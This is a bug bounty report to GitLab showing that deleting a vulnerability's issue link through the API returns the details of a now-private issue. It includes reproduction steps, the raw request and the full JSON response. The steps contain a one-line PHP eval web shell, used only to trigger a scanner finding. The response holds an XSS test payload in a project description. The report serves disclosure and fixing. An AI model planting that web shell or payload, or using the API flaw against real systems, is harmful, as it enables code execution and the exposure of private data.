Ability to access a previously accessible issue
HackerOne report #1179733 by wi11
on 2021-04-29, assigned to @ankelly:
Report | Attachments | How To Reproduce
Report
Summary
Hi team,
At GitLab, you can link to an existing issue for a vulnerability, and the issues can be linked across groups and projects.
The user can't link an issue that he can't access to. But the user can delete the issue link he has created before, and the related information about the issue will be returned when deleting, so if an issue link is created by a user and the visibility level of this issue is changed, the user can still delete this issue link to get the information about the issue that he can't access.
Request
DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1
Host: gitlab.com
Steps to reproduce
Step to reproduce
You need two accounts to reproduce this.
1.As the victim, create a public project -> create an issue.
2.As the attacker, You need to have a Vulnerability Report.(if you have one, jump to Step 4)
3.As attacker -> create a project -> go to Security & Compliance -> Configuration -> Enable (SAST) -> upload a php file with code <?php eval($_POST['888']);?>
to your repository -> wait for the pipeline passed -> go to Vulnerability report.
4.Go to Vulnerability report -> link issue that you create on Sept 1. (Paste the issue link)
5.Intercept the request -> remove the issue you will intercept the request like this, and send it to the repeater, remember don't forward it otherwise it will be removed
6.As the victim, change the project visibility to private and make some changes to the title and description on the issue that created at Step 1.
7.As the attacker sends the request, you will find that the information of the issue is returned.
Impact
After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.)
What is the current bug behavior?
When an issue link with a previously accessible issue was delete the information of the inaccessible issue was returned.
DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token:
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Accept-Encoding: gzip, deflate
Cookie:
HTTP/1.1 200 OK
Date: Thu, 29 Apr 2021 06:21:32 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS
Access-Control-Allow-Origin: https://gitlab.com
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size
Access-Control-Max-Age: 7200
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84"
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Gitlab-Feature-Category: vulnerability_management
X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ
X-Runtime: 0.237133
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
RateLimit-Observed: 9
RateLimit-Remaining: 1991
RateLimit-Reset: 1619677352
RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT
RateLimit-Limit: 2000
GitLab-LB: fe-09-lb-gprd
GitLab-SV: localhost
CF-Cache-Status: DYNAMIC
cf-request-id: 09bde33e1e00001a5e7033d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 64766e4368b11a5e-SIN
Content-Length: 3692
{"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"}
What is the expected correct behavior?
the information of the inaccessible issue should not be returned.
Output of checks
This bug happens on GitLab.com
Impact
After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.)
Attachments
How To Reproduce
Please add reproducibility information to this section: